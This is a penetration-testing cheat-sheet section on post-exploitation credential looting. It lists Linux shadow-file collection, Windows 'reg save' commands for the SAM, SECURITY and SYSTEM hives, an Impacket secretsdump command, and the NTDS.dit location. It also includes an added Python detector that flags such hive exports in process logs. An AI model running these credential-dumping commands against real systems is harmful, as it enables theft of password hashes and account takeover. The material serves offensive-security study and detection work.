Loot

Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑

Linux

Dump users and passwords

Collect files on target

/etc/passwd
/etc/shadow

Then unshadow and crack them.

Windows

Dump SAM

Collect files on target

reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system

Then crack them using Impacket's secretsdump:

secretsdump.py -sam sam -security security -system system LOCAL
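
From the defender's side, the three reg save commands above show up as process command lines in process-creation logs. The sketch below is an added example, not part of the original page; the host names and sample events are constructed, and the HIGH/MEDIUM labels are an assumption of this example.

```python
import re
from collections import defaultdict

# Matches "reg save" / "reg.exe save" against the three hives named above.
# The root key may be written hklm or HKEY_LOCAL_MACHINE; case and quoting vary.
# The lookahead stops subkeys such as hklm\system\... from matching.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)'
    r'\\(sam|security|system)(?=["\s]|$)',
    re.IGNORECASE,
)

# Constructed sample events (host, process command line), not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r"reg save hklm\sam .\sam"),
    ("WS01", r"reg save hklm\security .\security"),
    ("WS01", r"reg save hklm\system .\system"),
    ("WS02", r'"C:\Windows\System32\reg.exe" SAVE HKEY_LOCAL_MACHINE\SYSTEM C:\bk\system.hiv'),
    ("WS03", r"reg query hklm\software\microsoft /s"),
    ("WS04", r"reg save hklm\software\vendor .\vendor"),
]


def saved_hives(events):
    """Return {host: set of hive names exported with reg save}."""
    seen = defaultdict(set)
    for host, cmdline in events:
        match = HIVE_SAVE.search(cmdline)
        if match:
            seen[host].add(match.group(1).lower())
    return dict(seen)


def classify(events):
    """HIGH when SYSTEM (which holds the boot key) is saved together with SAM
    or SECURITY on the same host; MEDIUM for any other hive save."""
    alerts = {}
    for host, hives in saved_hives(events).items():
        complete = "system" in hives and bool(hives & {"sam", "security"})
        alerts[host] = "HIGH" if complete else "MEDIUM"
    return alerts


if __name__ == "__main__":
    for host, severity in sorted(classify(SAMPLE_EVENTS).items()):
        print(host, severity)
```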

Dump NTDS (DC)

By default, the Ntds.dit file is located at %SystemRoot%\NTDS\Ntds.dit on a domain controller.

TODO (see /13-misc/impacket.md)
